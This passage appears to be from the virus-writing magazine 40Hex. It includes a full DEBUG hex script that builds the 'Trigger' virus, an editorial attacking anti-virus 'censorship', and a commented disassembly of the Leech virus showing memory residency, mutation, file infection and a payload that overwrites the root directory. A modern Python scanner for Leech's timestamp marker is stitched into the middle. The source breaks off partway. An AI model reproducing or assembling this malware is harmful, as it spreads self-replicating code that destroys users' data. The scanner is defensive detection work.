40Hex Number 11 Volume 3 Issue 2

----begin trigger.scr------------------------------------------
n trigger.com
e 0100  E8 6E 00 00 54 72 69 67 67 65 72 20 62 79 20 44 
e 0110  61 72 6B 20 41 6E 67 65 6C 20 6F 66 20 50 68 61 
e 0120  6C 63 6F 6E 2F 53 6B 69 73 6D 0D 0A 55 74 69 6C 
e 0130  69 73 69 6E 67 20 44 61 72 6B 20 41 6E 67 65 6C 
e 0140  27 73 20 4D 75 6C 74 69 70 6C 65 20 45 6E 63 72 
e 0150  79 70 74 6F 72 20 28 44 41 4D 45 29 0D 0A 0D 0A 
e 0160  00 72 FA 0E 1F BA 00 B8 B8 40 00 8E C0 26 81 3E 
e 0170  63 FC 5D B8 F0 0C BB 41 44 CD 21 81 FB 48 47 75 
e 0180  3C 1E 06 0E 1F 33 C0 8D 76 5E 8E C0 33 FF B9 08 
e 0190  00 F3 A7 74 08 40 3D 00 A0 72 EC EB 1C 89 86 AE 
e 01A0  00 8E D8 C6 06 73 00 CB 55 BD 80 FF EB 00 9A 01 
e 01B0  00 00 00 5D C6 06 73 00 1F 07 1F EB 7F B8 90 4B 
e 01C0  CD 21 3B C3 74 76 1E 06 8C D8 48 8E D8 81 2E 03 
e 01D0  00 80 01 81 2E 12 00 80 01 8E 06 12 00 0E 1F 33 
e 01E0  FF 8D 76 FD B9 D1 04 F3 A5 33 C0 8E D8 83 2E 13 
e 01F0  04 06 BF 1F 02 BE 84 00 A5 A5 FA 9C 9C 58 80 CC 
e 0200  01 50 8C 06 06 00 C7 06 04 00 7F 01 9D B4 30 9C 
e 0210  FF 1E 84 00 9D 26 C5 36 1F 02 8B FE AD 26 A3 F0 
e 0220  01 AD 26 A3 F5 01 AC 26 A2 FA 01 1E 06 1F 07 B0 
e 0230  EA AA B8 E2 01 AB 8C D8 AB FB 07 1F 83 FC FE 75 
e 0240  0B 8D B6 64 01 BF 00 01 57 A5 A5 C3 8C D8 05 10 
e 0250  00 2E 01 86 7A 01 2E 03 86 72 01 8E D0 2E 8B A6 
e 0260  74 01 2E FF AE 78 01 CD 20 00 00 00 00 00 00 00 
e 0270  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 
e 0280  8B EC 50 8B 46 04 2E 3B 06 21 02 73 0B 2E A3 21 
e 0290  02 8B 46 02 2E A3 1F 02 58 5D CF 55 8B EC 50 8C 
e 02A0  C8 3B 46 04 74 F2 8B 46 04 2E 3B 06 21 02 75 14 
e 02B0  8B 46 02 2E 3B 06 1F 02 72 0A 2D 05 00 2E 3B 06 
e 02C0  1F 02 76 D4 06 57 FC 2E C4 3E 1F 02 B0 EA AA B8 
e 02D0  E2 01 AB 8C C8 AB 5F 07 81 66 06 FF FE EB B9 8B 
e 02E0  D8 CF 3D 90 4B 74 F8 1E 57 2E C5 3E 1F 02 C7 05 
e 02F0  34 12 C7 45 02 34 12 C6 45 04 12 5F 1F FC 3D 00 
e 0300  4B 74 48 1E 50 33 C0 8E D8 FA C7 06 04 00 9B 01 
e 0310  8C 0E 06 00 FB 9C 58 80 CC 01 50 9D 58 1F EA 00 
e 0320  00 00 00 9C 2E FF 1E 1F 02 C3 5A 59 B8 01 57 E8 
e 0330  F1 FF B4 3E E8 EC FF B8 01 43 5A 1F 59 E8 E3 FF 
e 0340  07 1F 5F 5E 5D 5B 5A 59 58 EB B8 50 51 52 53 55 
e 0350  56 57 1E 06 B8 00 43 E8 C9 FF 51 1E 52 B8 01 43 
e 0360  33 C9 E8 BE FF B8 02 3D E8 B8 FF 72 CA 93 B8 00 
e 0370  57 CD 21 51 52 B4 3F B9 18 00 0E 1F 0E 07 BA 67 
e 0380  01 8B F2 E8 9D FF 72 A2 BF F9 09 B9 0C 00 56 57 
e 0390  F3 A5 5F 5E B8 02 42 33 C9 99 CD 21 81 3D 4D 5A 
e 03A0  75 2E 81 3E 77 01 53 50 74 80 A3 FD 09 89 16 FB 
e 03B0  09 B9 10 00 F7 F1 2B 06 01 0A 89 16 0D 0A A3 0F 
e 03C0  0A 87 CA A3 07 0A C7 06 09 0A 53 50 B0 02 EB 34 
e 03D0  50 B9 04 00 33 D2 AC 02 D0 E2 FB 58 0A D2 74 C8 
e 03E0  BA 18 00 3B C2 73 07 B8 00 42 33 C9 CD 21 8B C8 
e 03F0  FE C5 2D 03 00 50 B0 E9 AA 58 AB 02 C4 04 E9 F6 
e 0400  D8 AA B0 03 98 53 87 CB 33 F6 BF 11 0C B9 D1 04 
e 0410  F3 A5 50 E8 67 00 58 BA 11 0C B9 A1 09 BE 91 0A 
e 0420  BF 11 0A E8 A2 00 51 81 3E F9 09 4D 5A 75 21 8B 
e 0430  16 FB 09 A1 FD 09 81 C1 A1 09 03 C1 83 D2 00 B9 
e 0440  00 02 F7 F1 0B D2 74 01 40 A3 FD 09 89 16 FB 09 
e 0450  FF D7 59 5B B4 40 BA 91 0A E8 C7 FE B4 40 B9 A1 
e 0460  09 BA 11 0C E8 BC FE B8 00 42 33 C9 99 CD 21 B4 
e 0470  40 B9 18 00 BA F9 09 E8 A9 FE E9 AD FE 52 51 53 
e 0480  B4 2C CD 21 E4 40 8A E0 E4 40 33 C1 33 D0 EB 1C 
e 0490  52 51 53 E4 40 05 00 00 BA 00 00 B9 07 00 D1 E0 
e 04A0  D1 D2 8A D8 32 DE 79 02 FE C0 E2 F2 A3 96 03 89 
e 04B0  16 99 03 8A C2 5B 59 5A C3 87 00 86 84 85 03 07 
e 04C0  0F 1F 5F 5E 5A 59 5B 58 FC 50 53 51 52 56 57 E8 
e 04D0  07 00 5F 5E 5A 5B 5B 58 C3 FC 50 B8 A7 09 97 AB 
e 04E0  96 AB AB 92 AB 93 AB 87 CA E8 44 02 B9 1A 00 F3 
e 04F0  AB E8 9C FF 25 FC FF 59 33 C8 E8 75 02 83 E3 03 
e 0500  8A 87 BE 03 98 03 D0 F7 D0 23 D0 8B C2 AB D1 E8 
e 0510  F6 C5 40 74 02 D1 E8 F6 C5 10 75 02 F7 D8 AB 92 
e 0520  F6 C5 20 75 02 F7 D8 AB E8 65 FF AB B8 84 84 AA 
e 0530  57 AB AA 5F E8 33 02 78 0B E8 00 02 AA E8 50 FF 
e 0540  A3 F1 09 4F 47 EB 03 E8 07 02 E8 EF 01 3C 03 72 
e 0550  F6 AA E8 15 02 78 04 E8 E2 01 AA E8 D2 01 8B 3E 
e 0560  A9 09 E8 16 02 BE F5 09 56 E8 06 02 83 E3 03 8A 
e 0570  00 98 A8 80 75 F3 80 8F F5 09 80 8B F0 FE 84 B1 
e 0580  09 03 DB 8B 97 ED 09 C6 06 A1 09 00 E8 6F 02 E8 
e 0590  E9 01 E8 06 01 51 80 E1 FC E8 AC 02 59 89 3E A7 
e 05A0  09 5E BA 04 00 AC A8 80 74 B4 4A 75 F8 BE A7 09 
e 05B0  BF A3 09 A5 A5 C6 06 A2 09 00 E8 65 00 F6 C5 40 
e 05C0  74 08 C6 06 A2 09 02 E8 58 00 BB A3 09 51 80 E1 
e 05D0  FC E8 58 00 59 B8 FC C3 AB BE BB 09 8B 3E AD 09 
e 05E0  51 E8 19 00 59 BB A5 09 E8 41 00 E8 8A 01 89 3E 
e 05F0  A9 09 BE CD 09 2B 3E AB 09 03 3E AF 09 F6 C5 20 
e 0600  74 04 03 3E ED 09 2B 3E F1 09 8B 4C FE E3 08 97 
e 0610  97 AD 97 01 05 E2 F9 8B 3E A9 09 8B CF 2B 0E AB 
e 0620  09 C3 E8 84 00 E8 DA 00 E8 7E 00 C3 8B 7F 04 53 
e 0630  C6 06 A1 09 00 A0 F7 09 25 07 00 BA 02 00 F6 C5 
e 0640  40 74 02 D1 E2 F6 C5 20 74 02 F7 DA E8 F9 02 B2 
e 0650  75 A0 F6 09 25 07 00 3C 04 74 26 52 BA 01 00 F6 
e 0660  C5 10 74 19 3C 01 75 13 E8 FF 00 78 0E 5A E8 01 
e 0670  01 87 DA 80 E2 02 80 CA E0 EB 06 F7 DA E8 C8 02 
e 0680  5A 5B 8B 07 2B C7 48 48 86 E0 8A C2 F6 C4 80 75 
e 0690  05 58 58 E9 2C FE AB 89 7F 04 C3 C6 06 A1 09 0A 
e 06A0  89 3E A9 09 8B 3E A7 09 C3 8B 3E A9 09 E8 CB 00 
e 06B0  A0 F8 09 25 07 00 3C 04 74 E1 E8 B5 00 80 FB C0 
e 06C0  77 D9 E8 13 00 E8 DB 00 E8 D0 FF 51 80 E1 FC FF 
e 06D0  50 01 59 89 3E A7 09 C3 C6 06 A1 09 00 E8 8A 00 
e 06E0  78 08 E8 8D 00 BE 07 09 EB 15 E8 85 00 83 E3 07 
e 06F0  80 FB 04 74 F5 80 BF B1 09 00 74 EE BE 3A 09 87 
e 0700  D3 C3 8B 3E A9 09 E8 72 00 A0 F7 09 25 07 00 BB 
e 0710  B6 03 D7 BD CB 09 E8 BF FF E8 0B 00 E8 84 00 BD 
e 0720  B9 09 E8 02 00 EB A1 50 AC 98 03 F0 58 46 46 C3 
e 0730  33 C0 BF B1 09 AB AB 40 AB 48 AB C3 E8 51 FD 25 
e 0740  07 00 8B F0 80 BC B1 09 00 75 F1 FE 84 B1 09 C3 
e 0750  92 8B F0 C6 84 B1 09 00 C3 50 51 57 BF B1 09 B9 
e 0760  08 00 33 C0 F2 AE 5F 59 58 C3 50 E8 22 FD 0B C0 
e 0770  58 C3 93 E8 1A FD 93 C3 E8 00 00 C6 06 A1 09 00 
e 0780  E8 00 00 E8 D3 FF 75 EF F6 C1 02 74 EA 50 52 E8 
e 0790  FE FC 92 E8 A6 FF E8 B8 FF BE EE 08 EB 07 56 E8 
e 07A0  E1 FF 5E 50 52 56 51 91 AC 98 91 E8 C4 FF 23 D9 
e 07B0  59 FE 06 A1 09 80 3E A1 09 0A 72 02 33 DB 53 FF 
e 07C0  10 5B 5E 5A 58 C3 BE 3A 09 83 E2 07 EB D5 BE 07 
e 07D0  09 EB D0 92 24 07 BB FF 08 D7 AA C3 92 25 0F 00 
e 07E0  0C 70 AB C3 0A C0 78 04 04 50 AA C3 05 30 FF EB 
e 07F0  0A 0A C0 78 04 04 58 AA C3 B4 8F E9 F0 00 BE 55 
e 0800  09 EB 9B E8 6C FF 53 2B D3 E8 F2 FF 5A EB 23 3C 
e 0810  04 73 35 50 52 E8 38 00 5A 58 86 F2 EB 30 E8 51 
e 0820  FF 53 33 D3 E8 D7 FF 5A E9 96 00 52 8B D0 E8 9B 
e 0830  00 5A E9 13 01 D1 CA E8 C4 FF EB 07 D1 C2 E8 BD 
e 0840  FF 0C 08 B4 D1 E9 A6 00 04 B8 AA 92 AB C3 04 04 
e 0850  04 B0 8A E2 AB C3 BE 66 09 EB A6 50 92 E8 84 FF 
e 0860  58 EB 8E B4 8B EB 6D E8 00 FF 78 EA BE 6F 09 E9 
e 0870  2C FF 52 50 52 E8 6C FF 58 E8 68 FF 58 E8 71 FF 
e 0880  58 E9 6D FF E8 D2 FE 75 14 52 50 E8 AE FE E8 D6 
e 0890  FF 5A E8 D7 FF 5A 92 E8 CD FF E9 B3 FE 0A C0 78 
e 08A0  0A 3A C2 7F 02 86 C2 0A D2 74 06 86 C2 B4 87 EB 
e 08B0  35 04 90 AA C3 E8 BA FE 53 33 D3 E8 03 00 5A EB 
e 08C0  00 BE 78 09 E9 D7 FE 0C 30 E9 8B 00 BE 81 09 E9 
e 08D0  CC FE B4 33 0A C0 78 09 0A D2 78 0A E8 8B FE 78 
e 08E0  05 86 C2 80 EC 02 D0 E0 D0 E0 D0 E0 0A C2 0A C0 
e 08F0  78 02 0C C0 86 E0 F6 C4 40 75 1D F6 C1 01 75 05 
e 0900  50 B0 2E AA 58 AB 2E 8B 76 00 03 F6 2E 89 7A 02 
e 0910  2E FF 46 00 A0 A2 09 98 AB C3 BE 86 09 E9 7E FE 
e 0920  B4 03 EB B0 BE 8B 09 E9 74 FE B4 2B EB A6 E8 50 
e 0930  00 4A EB 14 E8 45 00 42 EB 0E E8 35 FE 53 2B D3 
e 0940  E8 05 00 5A EB 02 F7 DA 0B D2 75 01 C3 BE 90 09 
e 0950  E9 4B FE 0A C0 74 0E 0A C0 78 02 04 C0 B4 81 E8 
e 0960  8C FF 92 AB C3 B0 05 AA EB F8 F7 DA 0B D2 74 DC 
e 0970  0A C0 74 04 04 28 EB DF B0 2D EB EB 50 04 08 EB 
e 0980  01 50 0A C0 79 07 B4 FF E8 63 FF 58 C3 04 40 AA 
e 0990  58 C3 BB 56 07 BE 67 07 EB 0F BB D2 07 EB 08 BB 
e 09A0  20 08 EB 03 BB 2A 08 8B F3 E8 AD FD 75 2E 50 56 
e 09B0  E8 89 FD E8 A0 FE 5E 5A 92 52 FF D6 5A E9 90 FD 
e 09C0  BB C1 07 BE CC 07 E8 90 FD 75 11 50 56 E8 6C FD 
e 09D0  E8 2B FE 92 5E 58 52 FF D6 5A EB E1 FF E3 BB 48 
e 09E0  08 BE 1A 08 EB E0 BB FE 06 BE 67 07 EB D8 0E 77 
e 09F0  06 77 06 C6 06 C6 06 CE 06 CE 06 D3 06 DC 06 F8 
e 0A00  F5 F9 FC FD FB CC F0 0E C1 07 FE 06 6C 08 48 08 
e 0A10  7C 08 81 08 41 07 43 07 0E C1 07 6C 08 48 08 48 
e 0A20  08 7C 08 81 08 41 07 43 07 0E C1 07 48 08 6C 08 
e 0A30  6C 08 81 08 7C 08 43 07 41 07 06 CC 07 56 07 24 
e 0A40  08 1A 08 06 CC 07 CC 07 24 08 1A 08 06 CC 07 CC 
e 0A50  07 1A 08 24 08 0E 48 07 E6 08 03 07 0F 07 1E 07 
e 0A60  2B 07 35 07 3C 07 06 63 07 63 07 92 08 5B 07 06 
e 0A70  9D 07 9D 07 72 07 84 07 06 C7 07 C7 07 C0 08 B5 
e 0A80  07 02 D2 07 9A 08 02 20 08 9F 08 02 2A 08 A4 08 
e 0A90  0E 53 08 53 08 DE 08 6A 08 2E 08 34 08 3A 08 3A 
e 0AA0  08 
rcx
09A1
w
q
-end trigger.scr---------------------------------------------------------------

40Hex Issue 11 Volume 3 Number 2                                      File 004

                         40-Hex Editorial

                         Virus Censorship
                           by DecimatoR

    Recently in the comp.virus echo of Usenet there was a discussion
entitled "40 Hex Censorship".  A few people were complaining about this 
magazine being censored by the anti-virus community, and on Internet 
itself.  I found this thread interesting, and figured I'd voice my opinions 
on it here, where it counts.  

    As many of you know, 40-Hex is one of the most popular underground mags.  
I was actually told by a European Anti-Virus researcher that 40-Hex was 
regarded as the best VX magazine in existence by most of the anti-virus
community.  Of course, I was quite happy to hear this.  (Who wouldn't be?) 
But I also couldn't help wondering, how could a magazine like 40-Hex, with no 
real distribution system, be the most popular?  It got me thinking, and I 
realized that we provide, in great detail, some of the most recent news, and 
developments in the virus community.  Anyone can publish source code and
hex dumps, but we take it a bit further.  40-Hex is more than just a how-to 
magazine, it's a publication which delves into details, world wide 
developments, and never-before distributed source code with new and
interesting programming techniques.  It's more than a source of viruses; it's 
a source of _information_.

    This also got me thinking, about the actual distribution system of 
40-Hex.  Each issue is distributed on two, and ONLY two bulletin boards - 
Digital Warfare and Liquid Euphoria.  From there, it is passed rapidly across 
the country, and, soon after, around the world.  Unfortunately, 40-Hex never 
seems to make it to a LARGE portion of the population who want it - the folks 
who hang out in the comp.virus echo of Usenet.  A few issues back, I 
posted a note there, asking for input on a survey I was conducting.  Over 
half of the replies I received didn't even answer my questions - all the
folks wanted to know was WHERE could they get their hands on 40-Hex?  After a 
little digging, I found 2 sites which allowed 40-Hex to be posted for 
anonymous FTP.  Within a month, both sites had removed the magazine.  
Censorship?  You bet.  See, the anti-virus folks on Usenet feel that this 
magazine is BAD.  After all, we publish source code which any virus author 
can learn by.  We encourage people to learn new programming techniques.  We 
tell the truth about how viruses work, and we're not afraid to give people 
code which shows HOW viruses do what they do, so that anyone who wishes to 
write a virus has the KNOWLEDGE to do so.  

    But does this make us bad?  Let's look at it again, in a slightly 
different perspective:

We publish source code which any anti-virus author can learn by.  We encourage
people to learn new programming techniques.  We tell the truth about how
viruses work, and we're not afraid to give people code which shows HOW viruses
do what they do, so that anyone who wishes to write anti-virus software has the
KNOWLEDGE to do so.  

Hmmm...  now do we seem so bad?  With the addition of a few "anti"s in that 
last paragraph, we turned 40-Hex around - from a bad underground magazine to 
a beneficial wealth of information.  Interesting, eh?

This seems to be where the Vesselin Bontchevs of the world have a serious 
problem seeing the forest, because of the trees.  Bontchev has often 
proclaimed, quite loudly, and in no uncertain terms, that virus code should 
NEVER, NEVER, NEVER, UNDER _ANY_ CIRCUMSTANCES, BE DISTRIBUTED TO ANYONE! 
Anyone, that is, except an anti-virus researcher like himself. 
Double standard?  Yes. 

A typical scenario on the newsgroup reads like this:

Joe Unknown:  Hi, I'm interested in writing an anti-virus package, and need
              to obtain viruses which I can experiment and work with.  Where
              can I find them?

Joe Established-AV-Person: You can't.  I don't know you, and no one else does 
                           either.  Therefore, you cannot be trusted, and you 
                           may not receive virus code.  You should be ashamed
                           for asking!  You probably just want to learn to
                           write viruses so you can wreak havoc on all 
                           computers everywhere!  Hmmmph!

    Yes, folks, it IS this bad.  The anti-virus guys talk of "ethical 
standards" which say that they just can't give out virus code, except to 
other established AV people.  Ethical standards?  DOUBLE STANDARDS!!!  What 
would happen, if they DID give their viruses to "unknown" people who wanted 
them?  Would massive virus infections result?  Maybe.  Would new anti-virus 
software packages be created?  Probably.  But will the AV guys give anyone a 
chance?  Hardly.

    It's this attitude which upsets a lot of people.  And one of them was 
upset enough to finally ask WHY 40-Hex was so censored on the net.  Of course,
he got the "ethical standard" reply.  But the true fact is - people WANT this 
(and any other) fine VX magazine!  The Nuke Infojournals, ARCV newsletters, 
the Crypt newsletters...  I've had people ask me time and time again WHERE 
they can find them on the Internet.  And I've told them, time and time again, 
"You can't.  Sorry."  

    Most of you who read this mag are involved in one of 3 groups:
The Virus underground, System Security, or Anti-Virus research.  Where did 
YOU obtain your copy of 40-Hex?  A BBS?  A friend?  A disk you found lying in 
the computer room?  Probably a BBS.  Certainly not Internet.  The poor folks 
on Internet are missing out on a LOT of good information, all because a 
handful of self-appointed experts decided that CENSORSHIP was better than 
KNOWLEDGE.  Of course, if I were to post this fact in comp.virus, my message 
would never get out.  Why?  Because the group is moderated by an individual 
who ranks right up there with the rest of the Censors.  Any message even 
vaguely requesting a source for viruses is killed before it gets out.  And 
certainly, any post containing source code, or a way to obtain viruses is 
nuked before it's ever seen by anyone.  THE COMP.VIRUS ECHO IS ONE OF THE 
MOST HEAVILY CENSORED NEWSGROUPS ON USENET!  Does this bother you?  It 
certainly bothers me!  INFORMATION IS POWER, FOLKS!  Stupidity is NOT!

    Recently I had a long conversation with Alan Solomon, head of S & S 
International, publisher of Dr. Solomon's Anti-Virus Toolkit.  It was a 
pleasant conversation, and Dr. Solly is a very nice person to talk to.  
Although we obviously don't see eye-to-eye on certain topics, we came to a 
general understanding - he does anti-virus work to help other people and to
make a living.  I run a virus board to pass on information and to fight
censorship.  I respect him for his ideals, and I believe he respects me 
for mine.  Of course, he doesn't approve of what I do, but he respects my 
reasons for doing it.  It was an interesting conversation; I'm glad we had it.  
Thanks, Alan - for everything.

    Censorship of viruses, virus code, and virus mags is quite strong.  Those 
in the underground often don't realize how censored this material really is, 
or how lucky they are to be able to obtain it with a phone call.  It really 
bugs me to think that people out there WANT the information contained inside 
this very issue, but are unable to get it because of the closed minds of a 
handful of "experts".

    Wake up people!  This is the 90's!  This is the INFORMATION AGE!  
Censorship doesn't HELP!  It HARMS!  Keeping people ignorant doesn't help 
them, it HURTS them!  Knowledge is power!  FREE INFORMATION IS WHAT CYBERSPACE
IS BASED ON!  Anything else is simply _wrong_.

          --Dec

40Hex Issue 11 Volume 3 Number 2                                      File 005

                          Virus Spotlight on: Leech

     This month's virus is a Bulgarian creation known as Leech.  It is mildly
polymorphic, implementing a simple code swapping algorithm.  It infects on
file execute and file close.  The infection upon file close is especially
noteworthy; look closely at the manipulation of the system file table (and see
the related article in this issue of 40Hex for more details).  This resident,
COM-specific infector also hides file length increases, although the stupid
CHKDSK error will occur.

                                               -- Dark Angel
                                                  Phalcon/Skism
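The length hiding mentioned above leaves a marker that a scanner run from a clean boot can find. In the findfirstnext handler of the disassembly that follows, Leech treats a directory entry as infected when the low five bits of its DOS time word equal 1Eh (a seconds field of 60, which no normally written file carries) and then subtracts virlength from the reported size whenever the file is at least virlength*2+1 bytes. The following Python scanner is an added example, not code from 40Hex or from Dark Angel: it parses the standard 32-byte FAT directory entry layout (the same entry findfirstnext reads from the DTA, offset by the FCB drive byte), applies the virus's own test, and shows the size the resident handler would have reported. The function names and the sample directory bytes are constructed for this example.

```python
import struct

VIRLENGTH = 1024                     # readbuffer - leech in the listing (1024 bytes)
STAMP = 0x1E                         # low five bits of the time word Leech stamps
MIN_INFECTED = VIRLENGTH * 2 + 1     # findfirstnext: smaller files are "not infected"

# Standard 32-byte FAT directory entry, little-endian:
# name(8)+ext(3), attribute, 10 reserved bytes, time, date, first cluster, size.
DIRENT = struct.Struct('<11sB10sHHHI')


def pack_dos_time(hours, minutes, seconds):
    """Pack h/m/s into a DOS time word (seconds stored in 2-second units)."""
    return (hours << 11) | (minutes << 5) | (seconds // 2)


def unpack_dos_time(time_word):
    """Inverse of pack_dos_time; a seconds value of 60 or 62 is never legitimate."""
    return (time_word >> 11) & 0x1F, (time_word >> 5) & 0x3F, (time_word & 0x1F) * 2


def has_leech_stamp(time_word):
    """Leech's own test: and ax,1Fh / cmp ax,1Eh  -> seconds field == 60."""
    return (time_word & 0x1F) == STAMP


def parse_dirent(raw):
    """Decode one 32-byte directory entry into a dict."""
    name, attr, _reserved, time_word, date_word, _cluster, size = DIRENT.unpack(raw)
    base = name[:8].decode('ascii').rstrip()
    ext = name[8:].decode('ascii').rstrip()
    return {'name': f'{base}.{ext}' if ext else base, 'attr': attr,
            'time': time_word, 'date': date_word, 'size': size}


def scan_directory(raw_dir):
    """Flag stamped entries and compute the size Leech would have reported.

    findfirstnext subtracts VIRLENGTH only when the size is at least
    MIN_INFECTED; smaller stamped files pass through unchanged, but a
    seconds field of 60 is still an anomaly, so they are listed as-is."""
    hits = []
    for off in range(0, len(raw_dir) - 31, 32):
        raw = raw_dir[off:off + 32]
        if raw[0] in (0x00, 0xE5):           # free or deleted slot
            continue
        ent = parse_dirent(raw)
        if not has_leech_stamp(ent['time']):
            continue
        reported = ent['size'] - VIRLENGTH if ent['size'] >= MIN_INFECTED else ent['size']
        hits.append({'name': ent['name'], 'size': ent['size'], 'reported': reported})
    return hits


def make_dirent(base, ext, time_word, date_word, size):
    """Build a constructed directory entry for the sample below (not real disk data)."""
    name = base.ljust(8).encode('ascii') + ext.ljust(3).encode('ascii')
    return DIRENT.pack(name, 0x20, b'\x00' * 10, time_word, date_word, 2, size)


DATE_1993 = (13 << 9) | (6 << 5) | 15    # 1993-06-15 in DOS date format

# Constructed sample directory: one clean file, one stamped file large enough
# to carry the virus, and one stamped file too small to hold it.
SAMPLE_DIR = b''.join([
    make_dirent('COMMAND', 'COM', pack_dos_time(12, 0, 0), DATE_1993, 47845),
    make_dirent('EDIT', 'COM', pack_dos_time(9, 30, 60), DATE_1993, 3000 + VIRLENGTH),
    make_dirent('TINY', 'COM', pack_dos_time(9, 30, 60), DATE_1993, 100),
])

if __name__ == '__main__':
    for hit in scan_directory(SAMPLE_DIR):
        print(f"{hit['name']:12} on disk {hit['size']:6}  Leech reports {hit['reported']:6}")
```

Run it against raw directory sectors (or entries copied out with a disk editor) while booted from clean media: with the virus resident, the Find First/Find Next path rewrites the size before any DOS program sees it, which is also why CHKDSK, which reads the FAT directly, complains about the mismatch.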
-------------------------------------------------------------------------------
                .model  tiny
                .code
                org     0
; Leech virus
; Disassembly by Dark Angel of Phalcon/Skism
; Assemble with Tasm /m Leech.asm

virlength       =       (readbuffer - leech)
reslength       =       (((encrypted_file - leech + 15) / 16) + 2)

leech:
                jmp     short enter_leech

filesize        dw      offset carrier
oldint21        dw      0, 0
oldint13        dw      0, 0
oldint24        dw      0, 0
datestore       dw      0
timestore       dw      0
runningflag     db      1
evenodd         dw      0

enter_leech:
                call    next
next:
                pop     si
mutatearea1:
                cli
                push    ds                      ; Why?
                pop     es
                mov     bp,sp                   ; save sp
                mov     sp,si                   ; sp = offset next
                add     sp,encrypt_value1 - 1 - next
mutatearea2:
                mov     cx,ss                   ; save ss
                mov     ax,cs
                mov     ss,ax                   ; ss = PSP
                pop     bx                      ; get encryption value
                dec     sp
                dec     sp
                add     si,startencrypt - next
                nop
decrypt:
mutatearea3:
                pop     ax
                xor     al,bh                   ; decrypt away!
                push    ax
                dec     sp
                cmp     sp,si
                jae     decrypt
startencrypt:
                mov     ax,es
                dec     ax
                mov     ds,ax                   ; ds->MCB
                db      81h,6,3,0               ;add word ptr ds:[3],-reslength
                dw      0 - reslength
                mov     bx,ds:[3]               ; bx = memory size
                mov     byte ptr ds:[0],'Z'     ; mark end of chain
                inc     ax                      ; ax->PSP
                inc     bx
                add     bx,ax                   ; bx->high area
                mov     es,bx                   ; as does es
                mov     ss,cx                   ; restore ss
                add     si,leech - startencrypt
                mov     bx,ds                   ; save MCB segment
                mov     ds,ax
                mov     sp,bp                   ; restore sp
                push    si
                xor     di,di
                mov     cx,virlength            ; 1024 bytes
                cld
                rep     movsb
                pop     si
                push    bx
                mov     bx,offset highentry
                push    es
                push    bx
                retf                            ; jmp to highentry in
                                                ; high memory
highentry:
                mov     es,ax                   ; es->PSP
                mov     ax,cs:filesize
                add     ax,100h                 ; find stored area
                mov     di,si
                mov     si,ax
                mov     cx,virlength
                rep     movsb                   ; and restore over virus code
                pop     es                      ; MCB
                xor     ax,ax
                mov     ds,ax                   ; ds->interrupt table
                sti
                cmp     word ptr ds:21h*4,offset int21 ; already resident?
                jne     go_resident
                db      26h,81h,2eh,3,0         ;sub word ptr es:[3],-reslength
                dw      0 - reslength           ; alter memory size
                test    byte ptr ds:[46Ch],0E7h ; 1.17% chance of activation
                jnz     exit_virus
                push    cs
                pop     ds
                mov     si,offset message
display_loop:                                   ; display ASCIIZ string
                lodsb                           ; get next character
                or      al,0                    ; exit if 0
                jz      exit_display_loop
                mov     ah,0Eh                  ; otherwise write character
                int     10h

                jmp     short display_loop
exit_display_loop:
                mov     ah,32h                  ; Get DPB -> DS:BX
                xor     dl,dl
                int     21h
                jc      exit_virus              ; exit on error

                call    getint13and24
                call    setint13and24
                mov     dx,[bx+10h]             ; first sector of root
                                                ; directory
                                                ; BUG: won't work in DOS 4+
                mov     ah,19h                  ; default drive -> al
                int     21h

                mov     cx,2                    ; overwrite root directory
                int     26h

                pop     bx
                call    setint13and24           ; restore int handlers
exit_virus:
                jmp     returnCOM
go_resident:
                db      26h, 81h, 6, 12h, 0     ;add word ptr es:12h,-reslength
                dw      0 - reslength           ; alter top of memory in PSP
                mov     bx,ds:46Ch              ; BX = random #
                push    ds
                push    cs
                pop     ds
                push    cs
                pop     es
                mov     runningflag,1           ; reset flag
                and     bh,80h
                mov     nothing1,bh
mutate1:
                test    bl,1
                jnz     mutate2
                mov     si,offset mutatearea1
                add     si,evenodd
                lodsb
                xchg    al,[si]                 ; swap instructions
                mov     [si-1],al
mutate2:
                test    bl,2
                jnz     mutate3
                mov     si,offset mutatearea2
                add     si,evenodd
                lodsw
                xchg    ax,[si]                 ; swap instructions
                mov     [si-2],ax
mutate3:
                test    bl,4
                jnz     mutate4
                mov     si,offset mutatearea3
                mov     al,2
                xor     [si],al                 ; flip between ax & dx
                xor     [si+2],al
                xor     [si+3],al
mutate4:
                test    bl,8
                jnz     findint21
                mov     si,offset next
                mov     di,offset readbuffer
                mov     cx,offset enter_leech
                push    si
                push    di
                lodsb
                cmp     al,5Eh                  ; 1 byte pop si?
                je      now_single_byte_encode
                inc     si                      ; skip second byte of two
                                                ; byte encoding of pop si
now_single_byte_encode:
                push    cx
                rep     movsb
                pop     cx
                pop     si
                pop     di
                cmp     al,5Eh                  ; 1 byte pop si?
                je      encode_two_bytes        ; then change to 2
                mov     al,5Eh                  ; encode a pop si
                stosb
                rep     movsb                   ; then copy decrypt over
                mov     al,90h                  ; plus a nop to keep virus
                stosb                           ; length constant
                xor     ax,ax                   ; clear the flag
                jmp     short set_evenodd_flag
encode_two_bytes:
                mov     ax,0C68Fh               ; encode a two byte form of
                stosw                           ; pop si
                rep     movsb
                mov     ax,1                    ; set evenodd flag
set_evenodd_flag:
                mov     cs:evenodd,ax
findint21:
                mov     ah,30h                  ; Get DOS version
                int     21h

                cmp     ax,1E03h                ; DOS 3.30?
                jne     notDOS33

                mov     ah,34h                  ; Get DOS critical error ptr
                int     21h

                mov     bx,1460h                ; int 21h starts here
                jmp     short alterint21
notDOS33:
                mov     ax,3521h                ; just get current int 21 handler
                int     21h
alterint21:
                mov     oldint21,bx
                mov     word ptr ds:oldint21+2,es
                mov     si,21h*4                ; save old int 21 handler
                pop     ds                      ; found in interrupt table
                push    si
                push    cs
                pop     es
                mov     di,offset topint21
                movsw
                movsw
                pop     di                      ; and put new one in
                push    ds
                pop     es
                mov     ax,offset int21
                stosw
                mov     ax,cs
                stosw

                mov     di,offset startencrypt
                mov     al,cs:encrypt_value1     ; decrypt original program code
decryptcode:
                xor     cs:[di],al
                inc     di
                cmp     di,offset decryptcode
                jb      decryptcode
returnCOM:
                mov     ah,62h                  ; Get current PSP
                int     21h

                push    bx                      ; restore segment registers
                mov     ds,bx
                mov     es,bx
                mov     ax,100h
                push    ax
                retf                            ; Return to PSP:100h

infect:
                push    si
                push    ds
                push    es
                push    di
                cld
                push    cs
                pop     ds
                xor     dx,dx                   ; go to start of file
                call    movefilepointer
                mov     dx,offset readbuffer    ; and read 3 bytes
                mov     ah,3Fh
                mov     cx,3
                call    callint21
                jc      exiterror

                xor     di,di
                mov     ax,readbuffer
